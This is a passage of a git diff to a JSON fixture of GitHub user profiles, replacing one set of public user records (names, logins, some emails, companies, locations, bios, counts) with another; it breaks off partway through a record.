"public_repositories_count": 4, + "created_at": "2014-09-29T15:58:13Z", + "updated_at": "2024-05-22T04:35:29Z", + "node_id": "MDQ6VXNlcjg5NjA5Nzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407453,174 +665602,174 @@ }, { "model": "github.user", - "pk": 1889, + "pk": 7188, "fields": { - "nest_created_at": "2024-09-12T00:29:41.941Z", - "nest_updated_at": "2024-09-12T00:29:41.941Z", - "name": "", - "login": "manochinnachamy", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/90769368?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:42:23.574Z", + "nest_updated_at": "2024-09-22T19:28:34.236Z", + "name": "Stefan Bodewig", + "login": "bodewig", + "email": "stefan.bodewig@freenet.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1318573?v=4", + "company": "@innoq ", + "location": "Mönchengladbach, Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-09-15T11:51:16Z", - "updated_at": "2023-08-09T04:04:15Z", - "node_id": "MDQ6VXNlcjkwNzY5MzY4", - "bio": "", + "followers_count": 71, + "public_gists_count": 7, + "public_repositories_count": 44, + "created_at": "2012-01-10T14:10:45Z", + "updated_at": "2024-09-19T06:59:07Z", + "node_id": "MDQ6VXNlcjEzMTg1NzM=", + "bio": "Open Source enthusiast, member of the ASF, maintainer of @xmlunit , long term contributor to ASF Ant and quite a few more projects, Senior Consultant at @innoq", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1890, + "pk": 7189, "fields": { - "nest_created_at": "2024-09-12T00:29:43.590Z", - "nest_updated_at": "2024-09-12T00:29:43.590Z", - "name": "Robyn", - "login": "underrobyn", + "nest_created_at": "2024-09-22T08:42:23.886Z", + "nest_updated_at": "2024-09-22T19:28:15.042Z", + "name": "Sion Williams", + "login": "willis7", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8399207?v=4", - "company": "", - "location": "UK", + "avatar_url": "https://avatars.githubusercontent.com/u/3193414?v=4", + "company": "ManyPets", + "location": "Exeter, UK", "collaborators_count": 0, - "following_count": 25, - "followers_count": 71, - "public_gists_count": 17, - "public_repositories_count": 60, - "created_at": "2014-08-09T00:09:36Z", - "updated_at": "2024-08-13T11:23:27Z", - "node_id": "MDQ6VXNlcjgzOTkyMDc=", - "bio": "DevSecOps Engineer who dabbles in telecoms & CTFs", + "following_count": 93, + "followers_count": 44, + "public_gists_count": 77, + "public_repositories_count": 155, + "created_at": "2013-01-05T15:14:24Z", + "updated_at": "2024-07-14T18:13:10Z", + "node_id": "MDQ6VXNlcjMxOTM0MTQ=", + "bio": "\r\nEngineering Director at ManyPets\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1891, + "pk": 7190, "fields": { - "nest_created_at": "2024-09-12T00:29:45.261Z", - "nest_updated_at": "2024-09-12T00:29:45.261Z", - "name": "João Filipe", - "login": "byjoaofilipe", + "nest_created_at": "2024-09-22T08:42:24.515Z", + "nest_updated_at": "2024-09-22T19:27:07.327Z", + "name": "Matthew Warman", + "login": "mcwarman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78802066?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7236500?v=4", "company": "", - "location": "Porto", + "location": "Bedford, United Kingdom", "collaborators_count": 0, "following_count": 3, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-02-09T13:19:36Z", - "updated_at": "2024-06-17T15:03:09Z", - "node_id": "MDQ6VXNlcjc4ODAyMDY2", - "bio": "Keep learning, keep building. ", + "followers_count": 10, + "public_gists_count": 6, + "public_repositories_count": 41, + "created_at": "2014-04-09T09:15:21Z", + "updated_at": "2024-09-13T12:11:25Z", + "node_id": "MDQ6VXNlcjcyMzY1MDA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1892, + "pk": 7191, "fields": { - "nest_created_at": "2024-09-12T00:29:46.506Z", - "nest_updated_at": "2024-09-12T00:29:46.506Z", - "name": "", - "login": "T1mey", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10464878?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:42:24.871Z", + "nest_updated_at": "2024-09-22T19:27:07.657Z", + "name": "Lars Grefer", + "login": "larsgrefer", + "email": "github@larsgrefer.de", + "avatar_url": "https://avatars.githubusercontent.com/u/6069961?v=4", + "company": "@materna-se", + "location": "Dortmund, Germany", "collaborators_count": 0, "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2015-01-09T14:52:31Z", - "updated_at": "2024-04-23T11:45:03Z", - "node_id": "MDQ6VXNlcjEwNDY0ODc4", - "bio": "", + "followers_count": 115, + "public_gists_count": 2, + "public_repositories_count": 118, + "created_at": "2013-11-30T00:11:58Z", + "updated_at": "2024-09-21T18:22:51Z", + "node_id": "MDQ6VXNlcjYwNjk5NjE=", + "bio": "IT specialist for application development and open source enthusiast", "is_hireable": false, - "twitter_username": "" + "twitter_username": "larsgrefer" } }, { "model": "github.user", - "pk": 1893, + "pk": 7192, "fields": { - "nest_created_at": "2024-09-12T00:29:48.135Z", - "nest_updated_at": "2024-09-12T00:29:48.135Z", - "name": "", - "login": "ChaseStauts", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60838137?v=4", - "company": "", + "nest_created_at": "2024-09-22T08:42:25.195Z", + "nest_updated_at": "2024-09-22T19:27:07.967Z", + "name": "Chris Badalucco", + "login": "ChrisBadalucco", + "email": "cbadalucco@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14287405?v=4", + "company": "@agoragames", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2020-02-09T07:20:37Z", - "updated_at": "2024-07-19T23:09:58Z", - "node_id": "MDQ6VXNlcjYwODM4MTM3", - "bio": "Computer Science undergraduate at Boise State University. Still learning, but that's what life's about.", + "public_repositories_count": 26, + "created_at": "2015-09-15T04:29:31Z", + "updated_at": "2024-08-29T19:33:16Z", + "node_id": "MDQ6VXNlcjE0Mjg3NDA1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1894, + "pk": 7193, "fields": { - "nest_created_at": "2024-09-12T00:29:51.385Z", - "nest_updated_at": "2024-09-12T00:29:51.385Z", - "name": "Inverse Integral", - "login": "InverseIntegral", - "email": "github@matteokamm.ch", - "avatar_url": "https://avatars.githubusercontent.com/u/7516482?v=4", - "company": "Ergon Informatik AG", - "location": "Zürich", + "nest_created_at": "2024-09-22T08:42:25.821Z", + "nest_updated_at": "2024-09-22T19:27:08.596Z", + "name": "Matthias", + "login": "nightm4re94", + "email": "matthias@gurkenlabs.de", + "avatar_url": "https://avatars.githubusercontent.com/u/26114385?v=4", + "company": "@gurkenlabs", + "location": "", "collaborators_count": 0, - "following_count": 49, - "followers_count": 40, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-05-07T20:10:33Z", - "updated_at": "2024-07-17T17:31:22Z", - "node_id": "MDQ6VXNlcjc1MTY0ODI=", - "bio": "Cloud Engineer @ergon", + "following_count": 157, + "followers_count": 32, + "public_gists_count": 2, + "public_repositories_count": 3, + "created_at": "2017-03-01T12:34:36Z", + "updated_at": "2024-07-29T13:05:03Z", + "node_id": "MDQ6VXNlcjI2MTE0Mzg1", + "bio": "I am no longer maintaining any public repositories in GitHub. Visit my Codeberg profile instead:\r\nhttps://codeberg.org/nightm4re", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1895, + "pk": 7194, "fields": { - "nest_created_at": "2024-09-12T00:29:52.566Z", - "nest_updated_at": "2024-09-12T00:35:44.788Z", + "nest_created_at": "2024-09-22T08:42:26.177Z", + "nest_updated_at": "2024-09-22T19:27:08.904Z", "name": "", - "login": "13CSherman", + "login": "SavvasMisaghMoayyed", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36085236?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/161620184?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-02-02T19:03:38Z", - "updated_at": "2022-12-06T20:59:34Z", - "node_id": "MDQ6VXNlcjM2MDg1MjM2", + "public_repositories_count": 0, + "created_at": "2024-02-28T15:34:14Z", + "updated_at": "2024-03-01T13:38:13Z", + "node_id": "U_kgDOCaIg2A", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407628,99 +665777,74 @@ }, { "model": "github.user", - "pk": 1896, + "pk": 7195, "fields": { - "nest_created_at": "2024-09-12T00:29:53.786Z", - "nest_updated_at": "2024-09-12T00:29:53.786Z", - "name": "Radu Sebastian LAZIN", - "login": "raduking", + "nest_created_at": "2024-09-22T08:42:26.492Z", + "nest_updated_at": "2024-09-22T19:27:09.226Z", + "name": "", + "login": "OliverO2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18284176?v=4", - "company": "8x8, Inc.", - "location": "Earth", + "avatar_url": "https://avatars.githubusercontent.com/u/4660803?v=4", + "company": "", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-04-05T11:02:48Z", - "updated_at": "2024-08-15T22:28:53Z", - "node_id": "MDQ6VXNlcjE4Mjg0MTc2", - "bio": "Just love computer programming.", + "following_count": 2, + "followers_count": 11, + "public_gists_count": 3, + "public_repositories_count": 32, + "created_at": "2013-06-10T12:11:55Z", + "updated_at": "2021-09-30T19:30:06Z", + "node_id": "MDQ6VXNlcjQ2NjA4MDM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1897, - "fields": { - "nest_created_at": "2024-09-12T00:29:55.011Z", - "nest_updated_at": "2024-09-12T00:29:55.011Z", - "name": "Nigel Jones", - "login": "planetf1", - "email": "nigel.l.jones@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7292002?v=4", - "company": "IBM", - "location": "Brighton & Hove, UK", - "collaborators_count": 0, - "following_count": 14, - "followers_count": 19, - "public_gists_count": 5, - "public_repositories_count": 127, - "created_at": "2014-04-14T15:38:13Z", - "updated_at": "2024-09-04T07:21:28Z", - "node_id": "MDQ6VXNlcjcyOTIwMDI=", - "bio": "developer @ IBM Quantum\r\n", - "is_hireable": false, - "twitter_username": "planetf1" - } -}, -{ - "model": "github.user", - "pk": 1898, + "pk": 7196, "fields": { - "nest_created_at": "2024-09-12T00:29:56.186Z", - "nest_updated_at": "2024-09-12T00:29:56.186Z", - "name": "Philippus Baalman", - "login": "Philippus", + "nest_created_at": "2024-09-22T08:42:26.812Z", + "nest_updated_at": "2024-09-22T19:27:09.535Z", + "name": "Paddy Drury", + "login": "PaddyDrury", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1923596?v=4", - "company": "@wehkamp formerly @trimm", + "avatar_url": "https://avatars.githubusercontent.com/u/12460398?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 28, - "followers_count": 49, - "public_gists_count": 9, - "public_repositories_count": 240, - "created_at": "2012-07-04T20:56:41Z", - "updated_at": "2024-08-27T13:37:53Z", - "node_id": "MDQ6VXNlcjE5MjM1OTY=", - "bio": "You had me at λ.", + "following_count": 6, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-05-15T12:35:10Z", + "updated_at": "2024-06-25T12:34:23Z", + "node_id": "MDQ6VXNlcjEyNDYwMzk4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1899, + "pk": 7197, "fields": { - "nest_created_at": "2024-09-12T00:29:57.766Z", - "nest_updated_at": "2024-09-12T00:29:57.766Z", - "name": "Oliver Wagner", - "login": "nauni77", + "nest_created_at": "2024-09-22T08:42:27.124Z", + "nest_updated_at": "2024-09-22T19:27:09.845Z", + "name": "Pavel Jandejsek", + "login": "paveljandejsek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39400842?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43804753?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2018-05-18T07:42:37Z", - "updated_at": "2024-08-27T20:47:02Z", - "node_id": "MDQ6VXNlcjM5NDAwODQy", + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2018-10-03T06:05:07Z", + "updated_at": "2024-09-21T11:48:05Z", + "node_id": "MDQ6VXNlcjQzODA0NzUz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407728,24 +665852,24 @@ }, { "model": "github.user", - "pk": 1900, + "pk": 7198, "fields": { - "nest_created_at": "2024-09-12T00:29:58.995Z", - "nest_updated_at": "2024-09-12T00:30:00.203Z", - "name": "", - "login": "tongd2020", + "nest_created_at": "2024-09-22T08:42:27.437Z", + "nest_updated_at": "2024-09-22T19:27:10.167Z", + "name": "R Appalla", + "login": "ideazinfinite", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78407555?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/903237?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-02-02T07:46:09Z", - "updated_at": "2021-02-02T08:12:06Z", - "node_id": "MDQ6VXNlcjc4NDA3NTU1", + "public_repositories_count": 2, + "created_at": "2011-07-08T16:13:03Z", + "updated_at": "2022-09-23T23:32:21Z", + "node_id": "MDQ6VXNlcjkwMzIzNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407753,74 +665877,74 @@ }, { "model": "github.user", - "pk": 1901, + "pk": 7199, "fields": { - "nest_created_at": "2024-09-12T00:30:01.414Z", - "nest_updated_at": "2024-09-12T00:30:01.414Z", - "name": "", - "login": "arunkumarthangavel", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101252722?v=4", + "nest_created_at": "2024-09-22T08:42:28.715Z", + "nest_updated_at": "2024-09-22T19:27:11.482Z", + "name": "Hakanai", + "login": "hakanai", + "email": "hakanai@ephemeral.garden", + "avatar_url": "https://avatars.githubusercontent.com/u/43236?v=4", "company": "", - "location": "", + "location": "Sydney, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-03-09T09:37:27Z", - "updated_at": "2024-01-10T14:19:15Z", - "node_id": "U_kgDOBgj-cg", - "bio": "", + "following_count": 23, + "followers_count": 43, + "public_gists_count": 188, + "public_repositories_count": 155, + "created_at": "2008-12-30T00:59:51Z", + "updated_at": "2024-02-11T16:00:31Z", + "node_id": "MDQ6VXNlcjQzMjM2", + "bio": "Incurable Mikuholic.\r\n\r\nI worked in Java but I prefer Kotlin. Still waiting for the perfect language. Unicode, CLDR and TZDB trivia collector. G↋n pusher.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "HakanaiVR" } }, { "model": "github.user", - "pk": 1902, + "pk": 7200, "fields": { - "nest_created_at": "2024-09-12T00:30:03.509Z", - "nest_updated_at": "2024-09-12T00:30:03.509Z", - "name": "Paulo Correia", - "login": "pacorreia", + "nest_created_at": "2024-09-22T08:42:29.352Z", + "nest_updated_at": "2024-09-22T19:27:12.119Z", + "name": "Winston Lee", + "login": "furikake", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54323159?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/304671?v=4", "company": "", - "location": "Portugal", + "location": "Melbourne, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 34, + "followers_count": 31, "public_gists_count": 6, - "public_repositories_count": 8, - "created_at": "2019-08-20T15:14:42Z", - "updated_at": "2024-08-22T14:35:05Z", - "node_id": "MDQ6VXNlcjU0MzIzMTU5", - "bio": "I'm a generalist with particular skills on data and platform/systems domain.\r\n\r\nLike to automate as much as possible, and help others do more with less.", + "public_repositories_count": 27, + "created_at": "2010-06-14T09:14:01Z", + "updated_at": "2023-07-24T23:59:25Z", + "node_id": "MDQ6VXNlcjMwNDY3MQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1903, + "pk": 7201, "fields": { - "nest_created_at": "2024-09-12T00:30:04.785Z", - "nest_updated_at": "2024-09-12T00:30:04.785Z", + "nest_created_at": "2024-09-22T08:42:29.982Z", + "nest_updated_at": "2024-09-22T19:27:12.781Z", "name": "", - "login": "AadiN17", + "login": "rarspace01", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86644196?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2642185?v=4", "company": "", - "location": "", + "location": "Internet", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-06-29T04:43:09Z", - "updated_at": "2023-06-07T06:29:33Z", - "node_id": "MDQ6VXNlcjg2NjQ0MTk2", + "following_count": 2, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 49, + "created_at": "2012-10-24T16:21:17Z", + "updated_at": "2024-09-09T12:45:55Z", + "node_id": "MDQ6VXNlcjI2NDIxODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407828,49 +665952,74 @@ }, { "model": "github.user", - "pk": 1904, + "pk": 7202, "fields": { - "nest_created_at": "2024-09-12T00:30:06.034Z", - "nest_updated_at": "2024-09-12T00:30:06.034Z", - "name": "", - "login": "pedrovilasboas", + "nest_created_at": "2024-09-22T08:42:30.305Z", + "nest_updated_at": "2024-09-22T19:27:13.097Z", + "name": "Martin Weber", + "login": "n0rthdev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77747407?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7472943?v=4", + "company": "teamecho", + "location": "Linz, Austria", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 9, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-01-20T18:02:10Z", - "updated_at": "2024-07-22T08:20:59Z", - "node_id": "MDQ6VXNlcjc3NzQ3NDA3", - "bio": "", + "public_repositories_count": 36, + "created_at": "2014-05-03T08:34:00Z", + "updated_at": "2024-09-20T08:31:42Z", + "node_id": "MDQ6VXNlcjc0NzI5NDM=", + "bio": "CTO @ teamecho", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1905, + "pk": 7203, "fields": { - "nest_created_at": "2024-09-12T00:30:07.625Z", - "nest_updated_at": "2024-09-12T00:30:07.625Z", - "name": "Monika", - "login": "beMonika", + "nest_created_at": "2024-09-22T08:42:30.631Z", + "nest_updated_at": "2024-09-22T19:27:13.431Z", + "name": "Lucas Holt", + "login": "laffer1", + "email": "luke@foolishgames.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1455037?v=4", + "company": "@MidnightBSD ", + "location": "Ypslianti, MI, USA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 27, + "public_gists_count": 8, + "public_repositories_count": 78, + "created_at": "2012-02-20T19:57:24Z", + "updated_at": "2024-09-04T11:20:50Z", + "node_id": "MDQ6VXNlcjE0NTUwMzc=", + "bio": "Lead developer for the @MidnightBSD project", + "is_hireable": false, + "twitter_username": "laffer1" + } +}, +{ + "model": "github.user", + "pk": 7204, + "fields": { + "nest_created_at": "2024-09-22T08:42:30.954Z", + "nest_updated_at": "2024-09-22T19:27:13.747Z", + "name": "Lorenzo Quiroli", + "login": "quiro91", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/125826844?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1331440?v=4", + "company": "ClearScore", + "location": "Barcelona", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-19T19:03:27Z", - "updated_at": "2023-09-27T10:40:40Z", - "node_id": "U_kgDOB3_3HA", + "followers_count": 19, + "public_gists_count": 10, + "public_repositories_count": 6, + "created_at": "2012-01-15T11:17:41Z", + "updated_at": "2024-09-10T19:07:58Z", + "node_id": "MDQ6VXNlcjEzMzE0NDA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407878,24 +666027,24 @@ }, { "model": "github.user", - "pk": 1906, + "pk": 7205, "fields": { - "nest_created_at": "2024-09-12T00:30:10.472Z", - "nest_updated_at": "2024-09-12T00:30:10.473Z", - "name": "Vindhya Hegde", - "login": "vindhyahegde31", + "nest_created_at": "2024-09-22T08:42:31.265Z", + "nest_updated_at": "2024-09-22T19:27:14.057Z", + "name": "Lars Ködderitzsch", + "login": "lkoe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113421418?v=4", - "company": "Appian Corporation", + "avatar_url": "https://avatars.githubusercontent.com/u/2411009?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-09-13T07:28:47Z", - "updated_at": "2024-05-21T12:31:11Z", - "node_id": "U_kgDOBsKsag", + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2012-09-24T10:57:22Z", + "updated_at": "2024-09-03T11:24:31Z", + "node_id": "MDQ6VXNlcjI0MTEwMDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407903,24 +666052,24 @@ }, { "model": "github.user", - "pk": 1907, + "pk": 7206, "fields": { - "nest_created_at": "2024-09-12T00:30:12.103Z", - "nest_updated_at": "2024-09-12T00:33:15.551Z", - "name": "", - "login": "sergeykad", + "nest_created_at": "2024-09-22T08:42:31.587Z", + "nest_updated_at": "2024-09-22T19:29:23.287Z", + "name": "Jan Köhler", + "login": "herrlock", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12783618?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10359089?v=4", "company": "", - "location": "Earth", + "location": "Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2015-06-07T10:50:53Z", - "updated_at": "2024-02-04T20:01:45Z", - "node_id": "MDQ6VXNlcjEyNzgzNjE4", + "following_count": 7, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2014-12-31T15:52:51Z", + "updated_at": "2024-06-05T05:19:14Z", + "node_id": "MDQ6VXNlcjEwMzU5MDg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407928,24 +666077,24 @@ }, { "model": "github.user", - "pk": 1908, + "pk": 7207, "fields": { - "nest_created_at": "2024-09-12T00:30:14.550Z", - "nest_updated_at": "2024-09-12T00:30:14.550Z", + "nest_created_at": "2024-09-22T08:42:31.900Z", + "nest_updated_at": "2024-09-22T19:27:14.681Z", "name": "", - "login": "Dhanxy", + "login": "herbert-venancio", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107783562?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29583414?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-06-19T04:40:23Z", - "updated_at": "2023-11-29T20:07:09Z", - "node_id": "U_kgDOBmylig", + "public_repositories_count": 15, + "created_at": "2017-06-20T20:34:28Z", + "updated_at": "2024-08-22T20:23:20Z", + "node_id": "MDQ6VXNlcjI5NTgzNDE0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407953,24 +666102,24 @@ }, { "model": "github.user", - "pk": 1909, + "pk": 7208, "fields": { - "nest_created_at": "2024-09-12T00:30:15.768Z", - "nest_updated_at": "2024-09-12T02:40:12.581Z", - "name": "", - "login": "Lingom-KSR", + "nest_created_at": "2024-09-22T08:42:32.215Z", + "nest_updated_at": "2024-09-22T19:27:15.004Z", + "name": "Gordon Innes", + "login": "gordoninnes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84766127?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78850122?v=4", + "company": "@Digital-Barriers", + "location": "Glasgow", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2021-05-25T06:52:38Z", - "updated_at": "2024-06-18T10:45:37Z", - "node_id": "MDQ6VXNlcjg0NzY2MTI3", + "public_repositories_count": 2, + "created_at": "2021-02-10T10:00:58Z", + "updated_at": "2024-07-30T15:43:24Z", + "node_id": "MDQ6VXNlcjc4ODUwMTIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -407978,24 +666127,24 @@ }, { "model": "github.user", - "pk": 1910, + "pk": 7209, "fields": { - "nest_created_at": "2024-09-12T00:30:16.950Z", - "nest_updated_at": "2024-09-12T00:30:16.950Z", - "name": "Göran Löwkrantz", - "login": "lastcmaster", + "nest_created_at": "2024-09-22T08:42:32.541Z", + "nest_updated_at": "2024-09-22T19:27:15.348Z", + "name": "Florian Schmitt", + "login": "florianschmitt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5843038?v=4", - "company": "isMobile AB", - "location": "Luleå, Sweden", + "avatar_url": "https://avatars.githubusercontent.com/u/817148?v=4", + "company": "", + "location": "Cologne, Germany", "collaborators_count": 0, "following_count": 3, - "followers_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-11-03T11:13:12Z", - "updated_at": "2024-03-08T10:14:02Z", - "node_id": "MDQ6VXNlcjU4NDMwMzg=", + "public_repositories_count": 26, + "created_at": "2011-05-29T14:53:13Z", + "updated_at": "2023-09-27T09:18:30Z", + "node_id": "MDQ6VXNlcjgxNzE0OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408003,24 +666152,24 @@ }, { "model": "github.user", - "pk": 1911, + "pk": 7210, "fields": { - "nest_created_at": "2024-09-12T00:30:18.182Z", - "nest_updated_at": "2024-09-12T00:30:18.182Z", - "name": "Adam Płaczek", - "login": "brudnyhenry", - "email": "adam.placzek@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16334927?v=4", + "nest_created_at": "2024-09-22T08:42:32.863Z", + "nest_updated_at": "2024-09-22T19:27:15.676Z", + "name": "Fabian Linz", + "login": "fabianlinz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8121542?v=4", "company": "", - "location": "Wroclaw", + "location": "Hamburg, Germay", "collaborators_count": 0, - "following_count": 7, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 25, - "created_at": "2015-12-17T10:13:20Z", - "updated_at": "2024-08-14T08:51:37Z", - "node_id": "MDQ6VXNlcjE2MzM0OTI3", + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2014-07-10T06:31:34Z", + "updated_at": "2024-09-05T11:30:32Z", + "node_id": "MDQ6VXNlcjgxMjE1NDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408028,74 +666177,74 @@ }, { "model": "github.user", - "pk": 1912, + "pk": 7211, "fields": { - "nest_created_at": "2024-09-12T00:30:19.432Z", - "nest_updated_at": "2024-09-12T00:30:19.432Z", - "name": "", - "login": "groboclown", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6464033?v=4", - "company": "", - "location": "Austin, TX, USA", + "nest_created_at": "2024-09-22T08:42:33.180Z", + "nest_updated_at": "2024-09-22T19:27:15.996Z", + "name": "Dmitrii Nikitin", + "login": "nikitin-da", + "email": "nikitin.da.90@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7294857?v=4", + "company": "Pushtorefresh", + "location": "Saint-Petersburg", "collaborators_count": 0, "following_count": 2, - "followers_count": 9, - "public_gists_count": 7, - "public_repositories_count": 52, - "created_at": "2014-01-21T19:39:31Z", - "updated_at": "2024-08-29T13:13:40Z", - "node_id": "MDQ6VXNlcjY0NjQwMzM=", + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-04-14T20:35:23Z", + "updated_at": "2023-12-19T16:41:14Z", + "node_id": "MDQ6VXNlcjcyOTQ4NTc=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1913, + "pk": 7212, "fields": { - "nest_created_at": "2024-09-12T00:30:20.680Z", - "nest_updated_at": "2024-09-12T00:30:20.680Z", - "name": "Megha Singhal", - "login": "meghasinghal1", + "nest_created_at": "2024-09-22T08:42:33.499Z", + "nest_updated_at": "2024-09-22T19:27:16.309Z", + "name": "David Miguel Lozano", + "login": "davidmigloz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13881466?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6546265?v=4", + "company": "brxs.com", + "location": "Amsterdam", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-08-20T05:20:01Z", - "updated_at": "2023-10-08T15:24:41Z", - "node_id": "MDQ6VXNlcjEzODgxNDY2", - "bio": "", - "is_hireable": false, + "following_count": 143, + "followers_count": 191, + "public_gists_count": 67, + "public_repositories_count": 88, + "created_at": "2014-01-30T16:53:45Z", + "updated_at": "2024-09-03T11:28:59Z", + "node_id": "MDQ6VXNlcjY1NDYyNjU=", + "bio": "Lead Engineer @ BRXS", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1914, + "pk": 7213, "fields": { - "nest_created_at": 